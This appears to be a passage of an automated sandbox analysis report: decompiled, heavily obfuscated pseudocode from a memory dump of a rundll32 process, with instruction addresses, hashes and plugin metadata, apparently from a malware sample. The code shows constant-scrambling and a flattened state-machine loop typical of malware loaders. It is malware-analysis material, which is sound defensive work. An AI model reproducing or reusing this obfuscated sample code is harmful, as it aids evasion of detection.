                                                                                                                      				_v428 = 0x18f383;
                                                                                                                      				_v428 = _v428 + 0xffff3777;
                                                                                                                      				_v428 = _v428 >> 1;
                                                                                                                      				_v428 = _v428 + 0xf3dd;
                                                                                                                      				_v428 = _v428 ^ 0x000e7633;
                                                                                                                      				_v188 = 0x34b02;
                                                                                                                      				_v188 = _v188 ^ 0xe768d075;
                                                                                                                      				_v188 = _v188 ^ 0xe766fcd1;
                                                                                                                      				_v88 = 0xb2b6ec;
                                                                                                                      				_v88 = _v88 | 0xb32e283a;
                                                                                                                      				_v88 = _v88 ^ 0xb3b69210;
                                                                                                                      				_v424 = 0x403e2a;
                                                                                                                      				_v424 = _v424 ^ 0x11634d1e;
                                                                                                                      				_v424 = _v424 | 0x9df6a7b5;
                                                                                                                      				_v424 = _v424 >> 2;
                                                                                                                      				_v424 = _v424 ^ 0x2776b69a;
                                                                                                                      				_v180 = 0x23f4a5;
                                                                                                                      				_v180 = _v180 << 7;
                                                                                                                      				_v180 = _v180 ^ 0x11fd1649;
                                                                                                                      				_v316 = 0xb84933;
                                                                                                                      				_v316 = _v316 | 0x4a16bd06;
                                                                                                                      				_v316 = _v316 << 1;
                                                                                                                      				_v316 = _v316 ^ 0x95764bca;
                                                                                                                      				_v420 = 0xe425a2;
                                                                                                                      				_v420 = _v420 << 7;
                                                                                                                      				_v420 = _v420 << 1;
                                                                                                                      				_v420 = _v420 >> 6;
                                                                                                                      				_v420 = _v420 ^ 0x039eaa37;
                                                                                                                      				_v292 = 0x9acd8a;
                                                                                                                      				_v292 = _v292 ^ 0x0e2fa243;
                                                                                                                      				_t1052 = 0x17;
                                                                                                                      				_v292 = _v292 / _t1052;
                                                                                                                      				_v292 = _v292 ^ 0x00a605f7;
                                                                                                                      				_v380 = 0x2df23b;
                                                                                                                      				_t938 = 0x6d;
                                                                                                                      				_v380 = _v380 * 0x74;
                                                                                                                      				_v380 = _v380 >> 0xc;
                                                                                                                      				_v380 = _v380 / _t938;
                                                                                                                      				_v380 = _v380 ^ 0x0002d8a7;
                                                                                                                      				_v192 = 0x38a983;
                                                                                                                      				_v192 = _v192 ^ 0x7338200d;
                                                                                                                      				_v192 = _v192 ^ 0x730638fe;
                                                                                                                      				_v356 = 0xf20a05;
                                                                                                                      				_v356 = _v356 + 0xff6b;
                                                                                                                      				_v356 = _v356 + 0x3cb0;
                                                                                                                      				_v356 = _v356 + 0xc3cc;
                                                                                                                      				_v356 = _v356 ^ 0x00f609fa;
                                                                                                                      				_v196 = 0x1d0726;
                                                                                                                      				_t939 = 0x1a;
                                                                                                                      				_v196 = _v196 / _t939;
                                                                                                                      				_v196 = _v196 + 0xb645;
                                                                                                                      				_v196 = _v196 ^ 0x000fece0;
                                                                                                                      				_v120 = 0xd811b7;
                                                                                                                      				_t940 = 0x3d;
                                                                                                                      				_v120 = _v120 / _t940;
                                                                                                                      				_v120 = _v120 ^ 0x0001bcc6;
                                                                                                                      				_v184 = 0xffd473;
                                                                                                                      				_v184 = _v184 | 0x4373bb07;
                                                                                                                      				_v184 = _v184 ^ 0x43f83aa1;
                                                                                                                      				_v372 = 0x3a762e;
                                                                                                                      				_v372 = _v372 + 0x1c4d;
                                                                                                                      				_t941 = 0x56;
                                                                                                                      				_v372 = _v372 * 0x6d;
                                                                                                                      				_v372 = _v372 << 4;
                                                                                                                      				_v372 = _v372 ^ 0x8f067f53;
                                                                                                                      				_v168 = 0xcae3b4;
                                                                                                                      				_v168 = _v168 | 0xbfa03ec2;
                                                                                                                      				_v168 = _v168 ^ 0xbfe1c53a;
                                                                                                                      				_v100 = 0xf6f3e0;
                                                                                                                      				_v100 = _v100 >> 3;
                                                                                                                      				_v100 = _v100 ^ 0x0013143a;
                                                                                                                      				_v412 = 0x1e0966;
                                                                                                                      				_v412 = _v412 >> 4;
                                                                                                                      				_v412 = _v412 + 0xffffee60;
                                                                                                                      				_v412 = _v412 | 0x230cd4d2;
                                                                                                                      				_v412 = _v412 ^ 0x230304c3;
                                                                                                                      				_v404 = 0x998131;
                                                                                                                      				_v404 = _v404 << 7;
                                                                                                                      				_v404 = _v404 | 0x77ffce0e;
                                                                                                                      				_v404 = _v404 ^ 0x7ff99efa;
                                                                                                                      				_v312 = 0x568591;
                                                                                                                      				_v312 = _v312 >> 0xf;
                                                                                                                      				_v312 = _v312 / _t941;
                                                                                                                      				_v312 = _v312 ^ 0x000b9c1e;
                                                                                                                      				_v160 = 0xbcadf8;
                                                                                                                      				_v160 = _v160 >> 1;
                                                                                                                      				_v160 = _v160 ^ 0x00564666;
                                                                                                                      				_v256 = 0x89dc62;
                                                                                                                      				_v256 = _v256 + 0xffff4163;
                                                                                                                      				_t942 = 0x31;
                                                                                                                      				_v256 = _v256 / _t942;
                                                                                                                      				_v256 = _v256 ^ 0x000723b0;
                                                                                                                      				_v320 = 0x8b7373;
                                                                                                                      				_v320 = _v320 ^ 0x53082765;
                                                                                                                      				_v320 = _v320 + 0xffaf;
                                                                                                                      				_v320 = _v320 ^ 0x53885e4a;
                                                                                                                      				_v92 = 0x6fe7c3;
                                                                                                                      				_v92 = _v92 / _t1056;
                                                                                                                      				_v92 = _v92 ^ 0x00052277;
                                                                                                                      				_v304 = 0xc66521;
                                                                                                                      				_v304 = _v304 + 0xffff290f;
                                                                                                                      				_v304 = _v304 + 0xffff5c28;
                                                                                                                      				_v304 = _v304 ^ 0x00cc2568;
                                                                                                                      				_v340 = 0x1cea4a;
                                                                                                                      				_v340 = _v340 >> 0xc;
                                                                                                                      				_t943 = 0x23;
                                                                                                                      				_v340 = _v340 * 0x60;
                                                                                                                      				_v340 = _v340 ^ 0x014bf5b0;
                                                                                                                      				_v340 = _v340 ^ 0x014272a9;
                                                                                                                      				_v152 = 0xc6e163;
                                                                                                                      				_v152 = _v152 + 0x3602;
                                                                                                                      				_v152 = _v152 ^ 0x00cdf824;
                                                                                                                      				_v296 = 0x3aa8f0;
                                                                                                                      				_v296 = _v296 + 0xffff263e;
                                                                                                                      				_v296 = _v296 / _t943;
                                                                                                                      				_v296 = _v296 ^ 0x0003475b;
                                                                                                                      				_v248 = 0xb8b108;
                                                                                                                      				_v248 = _v248 + 0xab20;
                                                                                                                      				_t944 = 0x75;
                                                                                                                      				_v248 = _v248 / _t944;
                                                                                                                      				_v248 = _v248 ^ 0x00035626;
                                                                                                                      				_v300 = 0xbacf;
                                                                                                                      				_v300 = _v300 >> 5;
                                                                                                                      				_v300 = _v300 / _t1052;
                                                                                                                      				_v300 = _v300 ^ 0x000b4ef1;
                                                                                                                      				_v172 = 0xfe2c89;
                                                                                                                      				_v172 = _v172 * 0x65;
                                                                                                                      				_v172 = _v172 ^ 0x6444a0c5;
                                                                                                                      				_v416 = 0xe4629;
                                                                                                                      				_v416 = _v416 << 1;
                                                                                                                      				_v416 = _v416 >> 0xf;
                                                                                                                      				_v416 = _v416 >> 8;
                                                                                                                      				_v416 = _v416 ^ 0x000284ee;
                                                                                                                      				_v308 = 0x20a4b4;
                                                                                                                      				_v308 = _v308 | 0x84e389a9;
                                                                                                                      				_v308 = _v308 * 0x13;
                                                                                                                      				_v308 = _v308 ^ 0xdce9fc24;
                                                                                                                      				_v276 = 0x7369a;
                                                                                                                      				_v276 = _v276 * 0x43;
                                                                                                                      				_v276 = _v276 << 9;
                                                                                                                      				_v276 = _v276 ^ 0xc69e4921;
                                                                                                                      				_v392 = 0xdfb120;
                                                                                                                      				_t1057 = 0x30;
                                                                                                                      				_v392 = _v392 / _t1057;
                                                                                                                      				_v392 = _v392 | 0xaf971ec4;
                                                                                                                      				_v392 = _v392 + 0xad3b;
                                                                                                                      				_v392 = _v392 ^ 0xaf95a150;
                                                                                                                      				_v400 = 0xf5e732;
                                                                                                                      				_v400 = _v400 << 0xd;
                                                                                                                      				_v400 = _v400 ^ 0x49123968;
                                                                                                                      				_v400 = _v400 << 0xa;
                                                                                                                      				_v400 = _v400 ^ 0xd1e13951;
                                                                                                                      				_v408 = 0xd34aa1;
                                                                                                                      				_v408 = _v408 | 0x4ccc3e1e;
                                                                                                                      				_t945 = 0x64;
                                                                                                                      				_v408 = _v408 * 0x42;
                                                                                                                      				_v408 = _v408 / _t945;
                                                                                                                      				_v408 = _v408 ^ 0x02168dd3;
                                                                                                                      				_v332 = 0xf683c0;
                                                                                                                      				_v332 = _v332 / _t1052;
                                                                                                                      				_v332 = _v332 >> 0xe;
                                                                                                                      				_v332 = _v332 ^ 0x000613e8;
                                                                                                                      				_v260 = 0x3cc9c3;
                                                                                                                      				_v260 = _v260 + 0xa75b;
                                                                                                                      				_t946 = 0x61;
                                                                                                                      				_v260 = _v260 * 0x22;
                                                                                                                      				_v260 = _v260 ^ 0x082f3be2;
                                                                                                                      				_v268 = 0x4bcd23;
                                                                                                                      				_v268 = _v268 << 0xa;
                                                                                                                      				_v268 = _v268 >> 0xe;
                                                                                                                      				_v268 = _v268 ^ 0x0006002f;
                                                                                                                      				_v376 = 0x8e25da;
                                                                                                                      				_v376 = _v376 ^ 0x089338b1;
                                                                                                                      				_v376 = _v376 + 0x9f1e;
                                                                                                                      				_v376 = _v376 * 0x3e;
                                                                                                                      				_v376 = _v376 ^ 0xf734e37c;
                                                                                                                      				_v288 = 0x2c1a1a;
                                                                                                                      				_v288 = _v288 >> 1;
                                                                                                                      				_v288 = _v288 + 0x65f9;
                                                                                                                      				_v288 = _v288 ^ 0x001f182d;
                                                                                                                      				_v396 = 0x261c11;
                                                                                                                      				_v396 = _v396 * 0x4a;
                                                                                                                      				_v396 = _v396 + 0xfc66;
                                                                                                                      				_v396 = _v396 / _t1057;
                                                                                                                      				_v396 = _v396 ^ 0x003f9cf3;
                                                                                                                      				_v208 = 0x249f02;
                                                                                                                      				_v208 = _v208 * 0x35;
                                                                                                                      				_v208 = _v208 | 0x0bd65ece;
                                                                                                                      				_v208 = _v208 ^ 0x0fd6fbcb;
                                                                                                                      				_v236 = 0xa548a3;
                                                                                                                      				_v236 = _v236 ^ 0x6a8a42f2;
                                                                                                                      				_v236 = _v236 | 0x2dc08498;
                                                                                                                      				_v236 = _v236 ^ 0x6fec3552;
                                                                                                                      				_v244 = 0x5b801b;
                                                                                                                      				_v244 = _v244 >> 0x10;
                                                                                                                      				_v244 = _v244 / _t946;
                                                                                                                      				_v244 = _v244 ^ 0x0007501f;
                                                                                                                      				_v164 = 0x4d0087;
                                                                                                                      				_v164 = _v164 | 0x435fc395;
                                                                                                                      				_v164 = _v164 ^ 0x4354d65b;
                                                                                                                      				_v252 = 0x449e75;
                                                                                                                      				_v252 = _v252 | 0x5d5fe7f7;
                                                                                                                      				_v252 = _v252 ^ 0x5d579835;
                                                                                                                      				_v344 = 0x288ce5;
                                                                                                                      				_t1053 = 0xf59c021;
                                                                                                                      				_v344 = _v344 + 0xb994;
                                                                                                                      				_t1058 = 0xa6cb997;
                                                                                                                      				_v344 = _v344 + 0xffff4f41;
                                                                                                                      				_t947 = 0x7b;
                                                                                                                      				_v344 = _v344 * 0x4e;
                                                                                                                      				_v344 = _v344 ^ 0x0c50f765;
                                                                                                                      				_v212 = 0x44a004;
                                                                                                                      				_v212 = _v212 / _t947;
                                                                                                                      				_v212 = _v212 | 0x4d1b1380;
                                                                                                                      				_v212 = _v212 ^ 0x4d12f735;
                                                                                                                      				_v148 = 0xb7f79c;
                                                                                                                      				_v148 = _v148 | 0x3407a1ee;
                                                                                                                      				_v148 = _v148 ^ 0x34b718ff;
                                                                                                                      				_v220 = 0xe82bd0;
                                                                                                                      				_v220 = _v220 ^ 0xc89b583b;
                                                                                                                      				_t948 = 0x12;
                                                                                                                      				_v220 = _v220 / _t948;
                                                                                                                      				_v220 = _v220 ^ 0x0b283f5f;
                                                                                                                      				_v156 = 0x5af0c5;
                                                                                                                      				_v156 = _v156 + 0x13dc;
                                                                                                                      				_v156 = _v156 ^ 0x00588292;
                                                                                                                      				_v228 = 0xdd0fc1;
                                                                                                                      				_v228 = _v228 ^ 0x01435610;
                                                                                                                      				_t949 = 0x1f;
                                                                                                                      				_v228 = _v228 * 0x7e;
                                                                                                                      				_v228 = _v228 ^ 0xcbf716b5;
                                                                                                                      				_v124 = 0xd80e40;
                                                                                                                      				_v124 = _v124 ^ 0x653de0e6;
                                                                                                                      				_v124 = _v124 ^ 0x65e35353;
                                                                                                                      				_v132 = 0x5632b9;
                                                                                                                      				_v132 = _v132 + 0xffff4616;
                                                                                                                      				_v132 = _v132 ^ 0x0058fa24;
                                                                                                                      				_v204 = 0xa86aea;
                                                                                                                      				_v204 = _v204 ^ 0x5463a324;
                                                                                                                      				_v204 = _v204 + 0xffff5f95;
                                                                                                                      				_v204 = _v204 ^ 0x54cedf8e;
                                                                                                                      				_v364 = 0xe8e823;
                                                                                                                      				_v364 = _v364 + 0xffffb955;
                                                                                                                      				_v364 = _v364 + 0xffffe3ba;
                                                                                                                      				_v364 = _v364 ^ 0x9235047b;
                                                                                                                      				_v364 = _v364 ^ 0x92d6764f;
                                                                                                                      				_v280 = 0xb242c7;
                                                                                                                      				_v280 = _v280 + 0xd280;
                                                                                                                      				_v280 = _v280 | 0xe772c78b;
                                                                                                                      				_v280 = _v280 ^ 0xe7f56f66;
                                                                                                                      				_v240 = 0xa7072;
                                                                                                                      				_v240 = _v240 + 0x191d;
                                                                                                                      				_v240 = _v240 ^ 0x431e7c4c;
                                                                                                                      				_v240 = _v240 ^ 0x431912b5;
                                                                                                                      				_v104 = 0x3f68c3;
                                                                                                                      				_v104 = _v104 << 1;
                                                                                                                      				_v104 = _v104 ^ 0x00784a5e;
                                                                                                                      				_v108 = 0xb2f51d;
                                                                                                                      				_v108 = _v108 ^ 0x0119eef7;
                                                                                                                      				_v108 = _v108 ^ 0x01a6bc10;
                                                                                                                      				_v328 = 0xc750f0;
                                                                                                                      				_v328 = _v328 / _t949;
                                                                                                                      				_v328 = _v328 + 0x3c71;
                                                                                                                      				_v328 = _v328 ^ 0x000854e6;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					_t1030 = 0x5edbe80;
                                                                                                                      					_t950 = 0x530629d;
                                                                                                                      					_t878 = 0x9627218;
                                                                                                                      					do {
                                                                                                                      						while(1) {
                                                                                                                      							L2:
                                                                                                                      							_t1070 = _t927 - _t878;
                                                                                                                      							if(_t1070 <= 0) {
                                                                                                                      								break;
                                                                                                                      							}
                                                                                                                      							__eflags = _t927 - _t1058;
                                                                                                                      							if(__eflags == 0) {
                                                                                                                      								_push(_v252);
                                                                                                                      								_push(_v164);
                                                                                                                      								_push(0x171648);
                                                                                                                      								_t1059 = E0017AB66(_v236, _v244, __eflags);
                                                                                                                      								_v44 = _v368;
                                                                                                                      								_v40 = _v360;
                                                                                                                      								_v36 = _v352;
                                                                                                                      								_t883 =  *0x195c9c; // 0x0
                                                                                                                      								_t885 =  *0x195c9c; // 0x0
                                                                                                                      								_t1032 =  *0x195c9c; // 0x0
                                                                                                                      								_t887 = E00184016(_v344,  *((intOrPtr*)(_t1032 + 0x5c)), _v236, _v80, _t879, _v212, _v140, _v148, _v220, _t885 + 0x50, _v236,  &_v44, _v156,  *((intOrPtr*)(_t883 + 0x58)), _v228);
                                                                                                                      								_t1065 =  &(_t1065[0x10]);
                                                                                                                      								__eflags = _t887 - _v336;
                                                                                                                      								if(_t887 != _v336) {
                                                                                                                      									_t927 = 0x1936859;
                                                                                                                      								} else {
                                                                                                                      									_t927 = _t1053;
                                                                                                                      									_t1063 = 1;
                                                                                                                      								}
                                                                                                                      								E0017AE03(_v124, _v132, _v204, _t1059);
                                                                                                                      								L24:
                                                                                                                      								_t1030 = 0x5edbe80;
                                                                                                                      								_t950 = 0x530629d;
                                                                                                                      								_t1058 = 0xa6cb997;
                                                                                                                      								_t878 = 0x9627218;
                                                                                                                      								goto L25;
                                                                                                                      							}
                                                                                                                      							__eflags = _t927 - 0xe23336a;
                                                                                                                      							if(__eflags == 0) {
                                                                                                                      								_t927 = 0x66c3b1;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      							__eflags = _t927 - _t1053;
                                                                                                                      							if(__eflags != 0) {
                                                                                                                      								goto L25;
                                                                                                                      							}
                                                                                                                      							E00177027(_v108, _v116, _v80, _v328);
                                                                                                                      							L18:
                                                                                                                      							return _t1063;
                                                                                                                      						}
                                                                                                                      						if(_t1070 == 0) {
                                                                                                                      							_push(_v308);
                                                                                                                      							_push(_v416);
                                                                                                                      							_push(0x171518);
                                                                                                                      							_t891 = E0017AB66(_v300, _v172, __eflags);
                                                                                                                      							_t1036 =  *0x195c9c; // 0x0
                                                                                                                      							__eflags = E0018FBCF(_v276, _t1036 + 0x5c, _v80, _v392, _v400, _v408, _t891, _v284, _v332, _v300,  &_v76) - _v384;
                                                                                                                      							_t927 =  ==  ? 0x530629d : _t1053;
                                                                                                                      							E0017AE03(_v260, _v268, _v376, _t891);
                                                                                                                      							_t1065 =  &(_t1065[0xe]);
                                                                                                                      							goto L24;
                                                                                                                      						}
                                                                                                                      						if(_t927 == 0x66c3b1) {
                                                                                                                      							_push(_v144);
                                                                                                                      							_push(_v84);
                                                                                                                      							_push(0x1715c8);
                                                                                                                      							_t897 = E0017AB66(_v216, _v136, __eflags);
                                                                                                                      							_push(_v388);
                                                                                                                      							_push(_v348);
                                                                                                                      							_push(0x171538);
                                                                                                                      							__eflags = E00180EDA(E0017AB66(_v232, _v272, __eflags), _v128, _v200, _t897,  &_v80, _v264, _v96) - _v324;
                                                                                                                      							_t927 =  ==  ? 0x5edbe80 : 0x7114309;
                                                                                                                      							E0017AE03(_v428, _v188, _v88, _t897);
                                                                                                                      							E0017AE03(_v424, _v180, _v316, _t898);
                                                                                                                      							_t1065 =  &(_t1065[0xf]);
                                                                                                                      							L9:
                                                                                                                      							_t1053 = 0xf59c021;
                                                                                                                      							goto L24;
                                                                                                                      						}
                                                                                                                      						if(_t927 == 0x1936859) {
                                                                                                                      							_t905 =  *0x195c9c; // 0x0
                                                                                                                      							E001768DE(_v364, _v280, _v240, _v104,  *((intOrPtr*)(_t905 + 0x58)));
                                                                                                                      							_t1065 =  &(_t1065[3]);
                                                                                                                      							_t927 = _t1053;
                                                                                                                      							while(1) {
                                                                                                                      								L1:
                                                                                                                      								_t1030 = 0x5edbe80;
                                                                                                                      								_t950 = 0x530629d;
                                                                                                                      								_t878 = 0x9627218;
                                                                                                                      								goto L2;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						if(_t927 == _t950) {
                                                                                                                      							_push(_t950);
                                                                                                                      							_push(_t950);
                                                                                                                      							_t967 =  *0x195c9c; // 0x0
                                                                                                                      							_t971 = E00183512( *((intOrPtr*)(_t967 + 0x5c)));
                                                                                                                      							_t911 =  *0x195c9c; // 0x0
                                                                                                                      							__eflags = _t971;
                                                                                                                      							_t927 =  !=  ? _t1058 : _t1053;
                                                                                                                      							 *((intOrPtr*)(_t911 + 0x58)) = _t971;
                                                                                                                      							goto L1;
                                                                                                                      						}
                                                                                                                      						_t1074 = _t927 - _t1030;
                                                                                                                      						if(_t927 != _t1030) {
                                                                                                                      							goto L25;
                                                                                                                      						}
                                                                                                                      						_push(_v192);
                                                                                                                      						_push(_v380);
                                                                                                                      						_push(0x171568);
                                                                                                                      						_t912 = E0017AB66(_v420, _v292, _t1074);
                                                                                                                      						_push(_v184);
                                                                                                                      						_t1055 = _t912;
                                                                                                                      						_t700 =  &_v120; // 0x784a5e
                                                                                                                      						_push( *_t700);
                                                                                                                      						_push(0x171618);
                                                                                                                      						_t913 = E0017AB66(_v356, _v196, _t1074);
                                                                                                                      						_v64 = _v176;
                                                                                                                      						_t915 = E0018BA68(_v372, _v168, _v100, _t1055, _v412);
                                                                                                                      						_v56 = _v56 & 0x00000000;
                                                                                                                      						_v60 = _t1055;
                                                                                                                      						_v52 = 1;
                                                                                                                      						_v68 = 2 + _t915 * 2;
                                                                                                                      						_v48 =  &_v68;
                                                                                                                      						_t918 = 0x20;
                                                                                                                      						_v76 = _t918;
                                                                                                                      						E00175C98(_v404, _v312, _t913, _v160,  &_v76,  &_v56, _v112, _v256,  &_v32, _t918, _v72, _v320);
                                                                                                                      						_t927 =  ==  ? 0x9627218 : 0xf59c021;
                                                                                                                      						E0017AE03(_v92, _v304, _v340, _t1055);
                                                                                                                      						E0017AE03(_v152, _v296, _v248, _t913);
                                                                                                                      						_t1065 =  &(_t1065[0x17]);
                                                                                                                      						goto L9;
                                                                                                                      						L25:
                                                                                                                      					} while (_t927 != 0x7114309);
                                                                                                                      					goto L18;
                                                                                                                      				}
                                                                                                                      			}

                                                                                                                      0x0017d4cb
                                                                                                                      0x0017d4d8
                                                                                                                      0x0017d4db
                                                                                                                      0x0017d4df
                                                                                                                      0x0017d4ec
                                                                                                                      0x0017d4f0
                                                                                                                      0x0017d4f8
                                                                                                                      0x0017d503
                                                                                                                      0x0017d50e
                                                                                                                      0x0017d519
                                                                                                                      0x0017d521
                                                                                                                      0x0017d529
                                                                                                                      0x0017d531
                                                                                                                      0x0017d539
                                                                                                                      0x0017d541
                                                                                                                      0x0017d553
                                                                                                                      0x0017d558
                                                                                                                      0x0017d561
                                                                                                                      0x0017d56c
                                                                                                                      0x0017d577
                                                                                                                      0x0017d589
                                                                                                                      0x0017d58e
                                                                                                                      0x0017d597
                                                                                                                      0x0017d5a2
                                                                                                                      0x0017d5ad
                                                                                                                      0x0017d5b8
                                                                                                                      0x0017d5c3
                                                                                                                      0x0017d5cb
                                                                                                                      0x0017d5d8
                                                                                                                      0x0017d5d9
                                                                                                                      0x0017d5dd
                                                                                                                      0x0017d5e2
                                                                                                                      0x0017d5ea
                                                                                                                      0x0017d5f5
                                                                                                                      0x0017d600
                                                                                                                      0x0017d60b
                                                                                                                      0x0017d616
                                                                                                                      0x0017d61e
                                                                                                                      0x0017d629
                                                                                                                      0x0017d631
                                                                                                                      0x0017d636
                                                                                                                      0x0017d63e
                                                                                                                      0x0017d646
                                                                                                                      0x0017d64e
                                                                                                                      0x0017d656
                                                                                                                      0x0017d65b
                                                                                                                      0x0017d663
                                                                                                                      0x0017d66b
                                                                                                                      0x0017d676
                                                                                                                      0x0017d687
                                                                                                                      0x0017d68e
                                                                                                                      0x0017d699
                                                                                                                      0x0017d6a4
                                                                                                                      0x0017d6ad
                                                                                                                      0x0017d6b8
                                                                                                                      0x0017d6c3
                                                                                                                      0x0017d6d7
                                                                                                                      0x0017d6dc
                                                                                                                      0x0017d6e3
                                                                                                                      0x0017d6ee
                                                                                                                      0x0017d6f6
                                                                                                                      0x0017d6fe
                                                                                                                      0x0017d706
                                                                                                                      0x0017d70e
                                                                                                                      0x0017d724
                                                                                                                      0x0017d72b
                                                                                                                      0x0017d736
                                                                                                                      0x0017d741
                                                                                                                      0x0017d74c
                                                                                                                      0x0017d757
                                                                                                                      0x0017d762
                                                                                                                      0x0017d76a
                                                                                                                      0x0017d776
                                                                                                                      0x0017d779
                                                                                                                      0x0017d77d
                                                                                                                      0x0017d785
                                                                                                                      0x0017d78d
                                                                                                                      0x0017d798
                                                                                                                      0x0017d7a3
                                                                                                                      0x0017d7ae
                                                                                                                      0x0017d7b9
                                                                                                                      0x0017d7cf
                                                                                                                      0x0017d7d6
                                                                                                                      0x0017d7e1
                                                                                                                      0x0017d7ec
                                                                                                                      0x0017d7fe
                                                                                                                      0x0017d803
                                                                                                                      0x0017d80a
                                                                                                                      0x0017d815
                                                                                                                      0x0017d820
                                                                                                                      0x0017d831
                                                                                                                      0x0017d838
                                                                                                                      0x0017d843
                                                                                                                      0x0017d856
                                                                                                                      0x0017d85d
                                                                                                                      0x0017d868
                                                                                                                      0x0017d870
                                                                                                                      0x0017d874
                                                                                                                      0x0017d879
                                                                                                                      0x0017d87e
                                                                                                                      0x0017d886
                                                                                                                      0x0017d891
                                                                                                                      0x0017d8a4
                                                                                                                      0x0017d8ab
                                                                                                                      0x0017d8b6
                                                                                                                      0x0017d8c9
                                                                                                                      0x0017d8d0
                                                                                                                      0x0017d8d8
                                                                                                                      0x0017d8e5
                                                                                                                      0x0017d8f3
                                                                                                                      0x0017d8f8
                                                                                                                      0x0017d8fc
                                                                                                                      0x0017d904
                                                                                                                      0x0017d90c
                                                                                                                      0x0017d914
                                                                                                                      0x0017d91c
                                                                                                                      0x0017d921
                                                                                                                      0x0017d929
                                                                                                                      0x0017d92e
                                                                                                                      0x0017d936
                                                                                                                      0x0017d93e
                                                                                                                      0x0017d94d
                                                                                                                      0x0017d950
                                                                                                                      0x0017d95c
                                                                                                                      0x0017d960
                                                                                                                      0x0017d968
                                                                                                                      0x0017d978
                                                                                                                      0x0017d97c
                                                                                                                      0x0017d981
                                                                                                                      0x0017d989
                                                                                                                      0x0017d994
                                                                                                                      0x0017d9a7
                                                                                                                      0x0017d9a8
                                                                                                                      0x0017d9af
                                                                                                                      0x0017d9ba
                                                                                                                      0x0017d9c5
                                                                                                                      0x0017d9cd
                                                                                                                      0x0017d9d5
                                                                                                                      0x0017d9e0
                                                                                                                      0x0017d9e8
                                                                                                                      0x0017d9f0
                                                                                                                      0x0017d9fd
                                                                                                                      0x0017da01
                                                                                                                      0x0017da09
                                                                                                                      0x0017da14
                                                                                                                      0x0017da1b
                                                                                                                      0x0017da26
                                                                                                                      0x0017da31
                                                                                                                      0x0017da3e
                                                                                                                      0x0017da42
                                                                                                                      0x0017da52
                                                                                                                      0x0017da56
                                                                                                                      0x0017da5e
                                                                                                                      0x0017da71
                                                                                                                      0x0017da78
                                                                                                                      0x0017da83
                                                                                                                      0x0017da8e
                                                                                                                      0x0017da99
                                                                                                                      0x0017daa4
                                                                                                                      0x0017daaf
                                                                                                                      0x0017daba
                                                                                                                      0x0017dac5
                                                                                                                      0x0017dad6
                                                                                                                      0x0017dadd
                                                                                                                      0x0017dae8
                                                                                                                      0x0017daf3
                                                                                                                      0x0017dafe
                                                                                                                      0x0017db09
                                                                                                                      0x0017db14
                                                                                                                      0x0017db1f
                                                                                                                      0x0017db2c
                                                                                                                      0x0017db34
                                                                                                                      0x0017db39
                                                                                                                      0x0017db41
                                                                                                                      0x0017db46
                                                                                                                      0x0017db55
                                                                                                                      0x0017db58
                                                                                                                      0x0017db5c
                                                                                                                      0x0017db64
                                                                                                                      0x0017db7a
                                                                                                                      0x0017db81
                                                                                                                      0x0017db8c
                                                                                                                      0x0017db97
                                                                                                                      0x0017dba2
                                                                                                                      0x0017dbad
                                                                                                                      0x0017dbb8
                                                                                                                      0x0017dbc3
                                                                                                                      0x0017dbd5
                                                                                                                      0x0017dbda
                                                                                                                      0x0017dbe3
                                                                                                                      0x0017dbee
                                                                                                                      0x0017dbf9
                                                                                                                      0x0017dc04
                                                                                                                      0x0017dc0f
                                                                                                                      0x0017dc1a
                                                                                                                      0x0017dc2d
                                                                                                                      0x0017dc2e
                                                                                                                      0x0017dc35
                                                                                                                      0x0017dc40
                                                                                                                      0x0017dc4b
                                                                                                                      0x0017dc56
                                                                                                                      0x0017dc61
                                                                                                                      0x0017dc6c
                                                                                                                      0x0017dc77
                                                                                                                      0x0017dc82
                                                                                                                      0x0017dc8d
                                                                                                                      0x0017dc98
                                                                                                                      0x0017dca3
                                                                                                                      0x0017dcae
                                                                                                                      0x0017dcb6
                                                                                                                      0x0017dcbe
                                                                                                                      0x0017dcc6
                                                                                                                      0x0017dcce
                                                                                                                      0x0017dcd6
                                                                                                                      0x0017dce1
                                                                                                                      0x0017dcec
                                                                                                                      0x0017dcf7

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 8s$#$*>@$.v:$/$0aQX$R5o$SSe$SN$^JxL$fFV$q<$rp$A@
                                                                                                                      • API String ID: 0-3270405876
                                                                                                                      • Opcode ID: d39602bd2d35f5ca19af7c3188ba3545ff50f25ad4861ec8bc56ce4529117330
                                                                                                                      • Instruction ID: 0f482e2c2a68bf8bf62c58045e8678457511c21ae52b1417f2e1cc56159916cc
                                                                                                                      • Opcode Fuzzy Hash: d39602bd2d35f5ca19af7c3188ba3545ff50f25ad4861ec8bc56ce4529117330
                                                                                                                      • Instruction Fuzzy Hash: 2792ED715093809FD3B9CF65C58AB8FBBE2BBC5304F10891DE19A86260DBB18949CF53
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E00179A7D(intOrPtr* __ecx) {
                                                                                                                      				char _v68;
                                                                                                                      				char _v76;
                                                                                                                      				char _v80;
                                                                                                                      				intOrPtr* _v84;
                                                                                                                      				char _v88;
                                                                                                                      				char _v92;
                                                                                                                      				char _v96;
                                                                                                                      				char _v100;
                                                                                                                      				char _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				signed int _v156;
                                                                                                                      				signed int _v160;
                                                                                                                      				signed int _v164;
                                                                                                                      				signed int _v168;
                                                                                                                      				signed int _v172;
                                                                                                                      				signed int _v176;
